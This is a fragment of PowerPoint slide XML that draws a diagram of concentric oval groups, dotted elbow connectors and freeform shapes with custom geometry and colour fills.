                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44891EFC-E468-4C3F-B82A-F0931E7430FB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74661" y="949014"/>
                <a:ext cx="2104624" cy="210149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6" name="Oval 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC15FD84-61D1-48A5-8C7F-47D128AA6D14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342017" y="1116120"/>
                <a:ext cx="1769913" cy="176728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7" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{549A8A73-A198-4F28-BA38-9A2A91695CFD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509372" y="1283227"/>
                <a:ext cx="1435202" cy="1433066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8" name="Oval 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F6F3DDC-8775-4C49-9AA2-0C0AD772B85B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676728" y="1450334"/>
                <a:ext cx="1100490" cy="109885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9" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3DDEDAF-BEC7-4043-BC08-297AC953B6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860668" y="1634000"/>
                <a:ext cx="732610" cy="73152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90" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6E49513-1785-4B9F-9AE4-267BFF4C9B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1043821" y="1816880"/>
                <a:ext cx="366305" cy="36576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603" name="Group 602">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54851586-1554-4C2E-99CE-3785B04E82C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4636077" y="2549651"/>
              <a:ext cx="2556485" cy="2552682"/>
              <a:chOff x="15546" y="790136"/>
              <a:chExt cx="2422854" cy="2419249"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1177" name="Oval 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F18D518-9604-49C5-ABA7-8446A9E50F00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5546" y="790136"/>
                <a:ext cx="2422854" cy="2419249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8" name="Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81109B84-3796-4B0D-92BE-1907917974E4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74661" y="949014"/>
                <a:ext cx="2104624" cy="210149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9" name="Oval 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{302BB37B-550E-41EC-9E71-FD9F78E383C5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342017" y="1116120"/>
                <a:ext cx="1769913" cy="176728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0" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B557D34-480F-45CC-932B-9D734BFF65A7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509372" y="1283227"/>
                <a:ext cx="1435202" cy="1433066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1" name="Oval 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FEF40EA-E933-45AC-BD13-350F41F54255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676728" y="1450334"/>
                <a:ext cx="1100490" cy="109885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2" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B180BF0-93A7-47B0-A2AF-25CB11807C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860668" y="1634000"/>
                <a:ext cx="732610" cy="73152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3" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F53CD7F2-EE4F-4410-91C8-1954C57D11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1043821" y="1816880"/>
                <a:ext cx="366305" cy="36576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95F36222-DBFF-453B-9C25-4DD1FE5AB4D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2450853" y="1973225"/>
              <a:ext cx="2556485" cy="2552682"/>
              <a:chOff x="15546" y="790136"/>
              <a:chExt cx="2422854" cy="2419249"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1170" name="Oval 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6988B314-27AF-48BB-B95C-68BF02402965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5546" y="790136"/>
                <a:ext cx="2422854" cy="2419249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1" name="Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A038CD1-44E6-42EC-8B01-C0E6D0E74DA5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74661" y="949014"/>
                <a:ext cx="2104624" cy="210149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2" name="Oval 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8720A7FF-4153-4FBC-9565-E7B0181D1E5B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342017" y="1116120"/>
                <a:ext cx="1769913" cy="176728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3" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D36682E9-0885-4189-B022-3A706AE7DC00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509372" y="1283227"/>
                <a:ext cx="1435202" cy="1433066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4" name="Oval 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{330EFEE3-E8E2-4F42-9C80-F4001552F038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676728" y="1450334"/>
                <a:ext cx="1100490" cy="109885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5" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA720F1B-470C-4C87-803C-1FD6927B20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860668" y="1634000"/>
                <a:ext cx="732610" cy="73152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6" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79411887-E0FB-4247-81B1-09BC55EC83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1043821" y="1816880"/>
                <a:ext cx="366305" cy="36576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605" name="Group 604">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9681397A-1C61-4AC8-8F68-59B3034626A4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6949214" y="3067061"/>
              <a:ext cx="2556485" cy="2552682"/>
              <a:chOff x="15546" y="790136"/>
              <a:chExt cx="2422854" cy="2419249"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1163" name="Oval 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EC066CB-1525-4A85-A056-BB4A57AF006B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5546" y="790136"/>
                <a:ext cx="2422854" cy="2419249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64" name="Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EEA4DC4-9095-4629-AE82-60154ABBB8D1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74661" y="949014"/>
                <a:ext cx="2104624" cy="210149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65" name="Oval 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CBDB03D-352C-46BF-8A10-49EEEF6E97AF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342017" y="1116120"/>
                <a:ext cx="1769913" cy="176728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66" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4057C09B-8A04-4D58-9798-4DCD1FECE018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509372" y="1283227"/>
                <a:ext cx="1435202" cy="1433066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67" name="Oval 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B89E085-B322-4FE3-8D14-58E303DB822A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676728" y="1450334"/>
                <a:ext cx="1100490" cy="1098853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68" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8B5E50B-EE33-40BB-9E0C-4F2A0DB9A3C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860668" y="1634000"/>
                <a:ext cx="732610" cy="73152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69" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52943403-2044-44F7-9B9A-86BE16EEA6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1043821" y="1816880"/>
                <a:ext cx="366305" cy="365760"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="606" name="Elbow Connector 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9418389F-D18D-4CF2-9DB7-3110AD688E4F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5304769" y="2471701"/>
              <a:ext cx="3474720" cy="274320"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/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7" name="Group 1074">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ED26E41-1F8E-46AE-AD0D-D686968B56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4219" y="4930895"/>
              <a:ext cx="2186989" cy="670262"/>
              <a:chOff x="694" y="2347"/>
              <a:chExt cx="1266" cy="388"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1149" name="Freeform 1309">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4660F2BE-4575-42C2-8017-1AAFB578806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94" y="2395"/>
                <a:ext cx="1266" cy="340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EC000"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="669900"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="19050" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd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50" name="Freeform 431">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2310513B-41FA-4BC7-BF08-874CA0BCCE6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871" y="2443"/>
                <a:ext cx="902" cy="243"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3135 w 6272"/>
                  <a:gd name="T1" fmla="*/ 1685 h 1685"/>
                  <a:gd name="T2" fmla="*/ 6272 w 6272"/>
                  <a:gd name="T3" fmla="*/ 841 h 1685"/>
                  <a:gd name="T4" fmla="*/ 3135 w 6272"/>
                  <a:gd name="T5" fmla="*/ 0 h 1685"/>
                  <a:gd name="T6" fmla="*/ 0 w 6272"/>
                  <a:gd name="T7" fmla="*/ 841 h 1685"/>
                  <a:gd name="T8" fmla="*/ 3135 w 6272"/>
                  <a:gd name="T9" fmla="*/ 1685 h 1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72" h="1685">
                    <a:moveTo>
                      <a:pt x="3135" y="1685"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6272" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3135" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3135" y="1685"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="12700" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:prstDash val="dash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151" name="Group 450">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB7734AB-3B37-4C11-B36B-0305001A18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22" y="2347"/>
                <a:ext cx="42" cy="96"/>
                <a:chOff x="1322" y="2347"/>
                <a:chExt cx="42" cy="96"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1161" name="Line 451">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46514833-9DB1-4870-9488-89C3650D6A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1322" y="2350"/>
                  <a:ext cx="0" cy="93"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="12700">
                  <a:solidFill>
                    <a:srgbClr val="96969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62" name="Freeform 452">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E8ADDE0-527C-4934-8C62-749EAA5270B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329" y="2347"/>
                  <a:ext cx="35" cy="23"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 246"/>
                    <a:gd name="T1" fmla="*/ 161 h 161"/>
                    <a:gd name="T2" fmla="*/ 246 w 246"/>
                    <a:gd name="T3" fmla="*/ 71 h 161"/>
                    <a:gd name="T4" fmla="*/ 0 w 246"/>
                    <a:gd name="T5" fmla="*/ 0 h 161"/>
                    <a:gd name="T6" fmla="*/ 0 w 246"/>
                    <a:gd name="T7" fmla="*/ 161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46" h="161">
                      <a:moveTo>
                        <a:pt x="0" y="161"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="246" y="71"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="161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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="8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52" name="Group 453">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83CCB4A2-FBA7-4CC9-BD9B-D751DEB0E3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1" y="2471"/>
                <a:ext cx="34" cy="93"/>
                <a:chOff x="1771" y="2471"/>
                <a:chExt cx="34" cy="93"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1159" name="Line 454">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4D4FC00-94CC-401A-9327-93E8B8209E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1773" y="2471"/>
                  <a:ext cx="0" cy="93"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="12700">
                  <a:solidFill>
                    <a:srgbClr val="96969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60" name="Freeform 455">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9CDEA39-00E7-480A-B180-C1964BEE515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771" y="2480"/>
                  <a:ext cx="34" cy="23"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 246"/>
                    <a:gd name="T1" fmla="*/ 159 h 159"/>
                    <a:gd name="T2" fmla="*/ 246 w 246"/>
                    <a:gd name="T3" fmla="*/ 69 h 159"/>
                    <a:gd name="T4" fmla="*/ 0 w 246"/>
                    <a:gd name="T5" fmla="*/ 0 h 159"/>
                    <a:gd name="T6" fmla="*/ 0 w 246"/>
                    <a:gd name="T7" fmla="*/ 159 h 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46" h="159">
                      <a:moveTo>
                        <a:pt x="0" y="159"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="246" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="159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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="8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53" name="Group 456">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A23B441A-D2DE-49C2-9121-ADA77FA2F8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22" y="2592"/>
                <a:ext cx="35" cy="94"/>
                <a:chOff x="1322" y="2592"/>
                <a:chExt cx="35" cy="94"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1157" name="Line 457">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D79C3D43-0B8F-422F-8DCB-F4E07B373D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1322" y="2592"/>
                  <a:ext cx="0" cy="94"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="12700">
                  <a:solidFill>
                    <a:srgbClr val="96969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58" name="Freeform 458">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CEA23F4-2BA1-47E2-9752-3607B95BA74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322" y="2592"/>
                  <a:ext cx="35" cy="23"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 246"/>
                    <a:gd name="T1" fmla="*/ 159 h 159"/>
                    <a:gd name="T2" fmla="*/ 246 w 246"/>
                    <a:gd name="T3" fmla="*/ 71 h 159"/>
                    <a:gd name="T4" fmla="*/ 0 w 246"/>
                    <a:gd name="T5" fmla="*/ 0 h 159"/>
                    <a:gd name="T6" fmla="*/ 0 w 246"/>
                    <a:gd name="T7" fmla="*/ 159 h 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46" h="159">
                      <a:moveTo>
                        <a:pt x="0" y="159"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="246" y="71"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="159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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="FF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54" name="Group 459">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B86AC32E-7E22-468B-BC2A-5A636DF84C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1" y="2471"/>
                <a:ext cx="35" cy="93"/>
                <a:chOff x="871" y="2471"/>
                <a:chExt cx="35" cy="93"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1155" name="Line 460">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C46FCF7-80EE-4C25-AAC7-39093CE6C7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871" y="2471"/>
                  <a:ext cx="0" cy="93"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="12700">
                  <a:solidFill>
                    <a:srgbClr val="96969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56" name="Freeform 461">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE8E41C3-57F3-477C-A7BF-DEE8112E12D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871" y="2471"/>
                  <a:ext cx="35" cy="23"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 246"/>
                    <a:gd name="T1" fmla="*/ 159 h 159"/>
                    <a:gd name="T2" fmla="*/ 246 w 246"/>
                    <a:gd name="T3" fmla="*/ 69 h 159"/>
                    <a:gd name="T4" fmla="*/ 0 w 246"/>
                    <a:gd name="T5" fmla="*/ 0 h 159"/>
                    <a:gd name="T6" fmla="*/ 0 w 246"/>
                    <a:gd name="T7" fmla="*/ 159 h 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46" h="159">
                      <a:moveTo>
                        <a:pt x="0" y="159"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="246" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="159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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="8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08" name="Group 914">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4592C063-5642-4DAA-9C77-A8EB5458BE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4251" y="3142121"/>
              <a:ext cx="745152" cy="641454"/>
              <a:chOff x="4127" y="1852"/>
              <a:chExt cx="503" cy="433"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1146" name="Freeform 908">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{635776F6-1E2E-4A3D-9E3D-92306123B1F4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4343" y="1910"/>
                <a:ext cx="287" cy="375"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1809"/>
                  <a:gd name="T1" fmla="*/ 0 h 2360"/>
                  <a:gd name="T2" fmla="*/ 1809 w 1809"/>
                  <a:gd name="T3" fmla="*/ 487 h 2360"/>
                  <a:gd name="T4" fmla="*/ 1809 w 1809"/>
                  <a:gd name="T5" fmla="*/ 2360 h 2360"/>
                  <a:gd name="T6" fmla="*/ 0 w 1809"/>
                  <a:gd name="T7" fmla="*/ 1873 h 2360"/>
                  <a:gd name="T8" fmla="*/ 0 w 1809"/>
                  <a:gd name="T9" fmla="*/ 0 h 2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09" h="2360">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1809" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1809" y="2360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="187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C2EB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47" name="Freeform 909">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D7F3433-FFB0-4EA5-853B-F71761FD11C6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4127" y="1929"/>
                <a:ext cx="216" cy="356"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1358"/>
                  <a:gd name="T1" fmla="*/ 366 h 2239"/>
                  <a:gd name="T2" fmla="*/ 1358 w 1358"/>
                  <a:gd name="T3" fmla="*/ 0 h 2239"/>
                  <a:gd name="T4" fmla="*/ 1358 w 1358"/>
                  <a:gd name="T5" fmla="*/ 1875 h 2239"/>
                  <a:gd name="T6" fmla="*/ 0 w 1358"/>
                  <a:gd name="T7" fmla="*/ 2239 h 2239"/>
                  <a:gd name="T8" fmla="*/ 0 w 1358"/>
                  <a:gd name="T9" fmla="*/ 366 h 2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8" h="2239">
                    <a:moveTo>
                      <a:pt x="0" y="366"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1358" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1358" y="1875"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="36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48" name="Freeform 910">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED63FE81-0DF6-457E-ADB3-C14FDFB9D2B7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4127" y="1852"/>
                <a:ext cx="503" cy="135"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3167"/>
                  <a:gd name="T1" fmla="*/ 364 h 851"/>
                  <a:gd name="T2" fmla="*/ 1809 w 3167"/>
                  <a:gd name="T3" fmla="*/ 851 h 851"/>
                  <a:gd name="T4" fmla="*/ 3167 w 3167"/>
                  <a:gd name="T5" fmla="*/ 485 h 851"/>
                  <a:gd name="T6" fmla="*/ 1356 w 3167"/>
                  <a:gd name="T7" fmla="*/ 0 h 851"/>
                  <a:gd name="T8" fmla="*/ 0 w 3167"/>
                  <a:gd name="T9" fmla="*/ 364 h 8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67" h="851">
                    <a:moveTo>
                      <a:pt x="0" y="364"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1809" y="851"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3167" y="485"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1356" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="364"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="9DC2EB"/>
              </a:soli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609" name="Freeform 905">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B2E8605-F625-4D94-98FD-D85EA7FB811D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="6735364" y="1036691"/>
              <a:ext cx="519978" cy="2769099"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 349 w 351"/>
                <a:gd name="T1" fmla="*/ 1810 h 1810"/>
                <a:gd name="T2" fmla="*/ 0 w 351"/>
                <a:gd name="T3" fmla="*/ 1714 h 1810"/>
                <a:gd name="T4" fmla="*/ 1 w 351"/>
                <a:gd name="T5" fmla="*/ 0 h 1810"/>
                <a:gd name="T6" fmla="*/ 351 w 351"/>
                <a:gd name="T7" fmla="*/ 94 h 1810"/>
